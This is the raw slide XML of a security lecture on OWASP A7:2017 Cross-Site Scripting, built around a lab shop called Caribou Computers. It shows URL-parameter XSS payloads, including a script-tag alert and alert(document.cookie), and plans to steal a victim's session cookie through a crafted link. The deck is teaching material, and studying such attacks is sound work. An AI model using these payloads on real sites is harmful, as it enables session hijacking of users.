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sldIdLst>
    <p:sldId id="268" r:id="rId2"/>
    <p:sldId id="333" r:id="rId3"/>
    <p:sldId id="334" r:id="rId4"/>
    <p:sldId id="335" r:id="rId5"/>
    <p:sldId id="367" r:id="rId6"/>
    <p:sldId id="381" r:id="rId7"/>
    <p:sldId id="369" r:id="rId8"/>
    <p:sldId id="370" r:id="rId9"/>
    <p:sldId id="371" r:id="rId10"/>
    <p:sldId id="372" r:id="rId11"/>
    <p:sldId id="373" r:id="rId12"/>
    <p:sldId id="375" r:id="rId13"/>
    <p:sldId id="377" r:id="rId14"/>
    <p:sldId id="379" r:id="rId15"/>
    <p:sldId id="380" r:id="rId16"/>
    <p:sldId id="382" r:id="rId17"/>
    <p:sldId id="383" r:id="rId18"/>
    <p:sldId id="384" r:id="rId19"/>
    <p:sldId id="385" r:id="rId20"/>
    <p:sldId id="386" r:id="rId21"/>
    <p:sldId id="387" r:id="rId22"/>
    <p:sldId id="389" r:id="rId23"/>
    <p:sldId id="38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FF3F"/>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0" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="219"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5/7/2023</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5/7/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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5/7/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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5/7/2023</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5/7/2023</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5/7/2023</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5/7/2023</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5/7/2023</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5/7/2023</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5/7/2023</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5/7/2023</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5/7/2023</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excess-xss.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creativecommons.org/licenses/by-sa/3.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C07DDD9-44B9-4DDC-AD36-6E0E90963758}"/>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2090" b="12090"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15" y="10"/>
            <a:ext cx="12191985" cy="4578340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148F256B-1C20-47A6-92E3-6CAFC3E4BF92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097279" y="4799362"/>
            <a:ext cx="10113645" cy="743682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Development &amp; Best Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{918AA328-CC01-4A3F-8A04-FA3FA838E6FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097279" y="5715000"/>
            <a:ext cx="10113264" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lecture 10 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A7:2017-Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{303A4B1D-575F-4373-BBD1-AF7B812E2DFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15" y="4578350"/>
            <a:ext cx="12191985" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="http://excess-xss.com/"/>
              </a:rPr>
              <a:t>This Photo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900"/>
              <a:t> by Unknown Author is licensed under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId4" tooltip="https://creativecommons.org/licenses/by-sa/3.0/"/>
              </a:rPr>
              <a:t>CC BY-SA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3782972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Caribou Computers</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935353" y="2120899"/>
            <a:ext cx="10220325" cy="1361088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you do this.  You will see that the words for “Dave’s Fish Market” are written in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>bold text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>! This tells us something important about this affiliate functionality.  The URL field allows us to pass in HTML tags!  If we can do that perhaps we can pass in some other tags.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As we’ve seen in the AJAX example. A JavaScript program can be passed using a &lt;script&gt; tag…let’s see if that works!  We will try to pass a script tag containing the JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>alert()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function.  This creates a dialog box on your screen containing a message.  It’s usually for sending error messages but it’s easy to code and is supported in every browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://172.16.1.242/caribou_computers.php?referrer=&lt;b&gt;Daves Fish Market&lt;/b&gt;&lt;script&gt;alert('boom')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C8DB664-EECA-4635-B4E9-D9F06936CD0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935353" y="3429000"/>
            <a:ext cx="10220325" cy="2763187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:effectLst>
            <a:softEdge rad="0"/>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="0" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="925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rgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;&lt;HEAD&gt;&lt;style&gt; table { border-collapse: collapse; width: 100%; }</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, td { text-align: left; padding: 8px;}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tr:nth-child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(even)</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background-color: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Lightgreen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; }&lt;/style&gt;&lt;/HEAD&gt;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&lt;BODY&gt;&lt;h1 style='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>text-align:center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'&gt;Welcome to Caribou Computers&lt;/h1&gt;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&lt;div style="height:100px;border:2px solid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>black;text-align:center;position:relative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;"&gt;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&lt;span style='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>color:green</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;'&gt;Logged in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>as:testg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!&lt;/span&gt;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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/&gt;Referred by: &lt;b&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Daves</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3FFF3F"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Fish Market&lt;/b&gt;&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130738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Caribou Computers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D234F38-7258-4B8D-A5C4-CE26D9119E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78768" y="2578919"/>
            <a:ext cx="5031422" cy="2330251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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6515944" y="2120900"/>
            <a:ext cx="4639736" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ok, now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>that’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a huge problem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clearly there’s all sorts of code injection that we can do just by altering the link.  So, all we have to do now is think of an interesting use for it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can’t use this to steal credentials very easily, since JavaScript runs on the browser and the browser doesn’t know what your credentials are unless you are making a post request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This page only comes up after the user has authenticated. So that’s not much help.  We need something that’s passed around all the time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="494023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Caribou Computers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D234F38-7258-4B8D-A5C4-CE26D9119E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78768" y="2578919"/>
            <a:ext cx="5031422" cy="2330251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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6515944" y="2120900"/>
            <a:ext cx="4639736" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But what about the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>session cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That’s a possibility…JavaScript can see all the cookie information in a variable called: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We can check this by changing our link to create an alert box with the cookie variable in it, like so: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">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a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, that only shows the data to the cookie owner.  To get a user to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>give</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> their cookie to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>us.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> We’re going to have to get….creative!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4059654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Caribou Computers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D234F38-7258-4B8D-A5C4-CE26D9119E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78768" y="2689779"/>
            <a:ext cx="5031422" cy="2108531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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6515944" y="2120900"/>
            <a:ext cx="4639736" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So how did we get our malicious code into their site to begin with?  We used a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" u="sng" dirty="0"/>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Couldn’t we use a link to get the data out?  We might have to trick the user to click it, but it might work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can we add a link to the caribou computers site through the URL?  Try adding this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
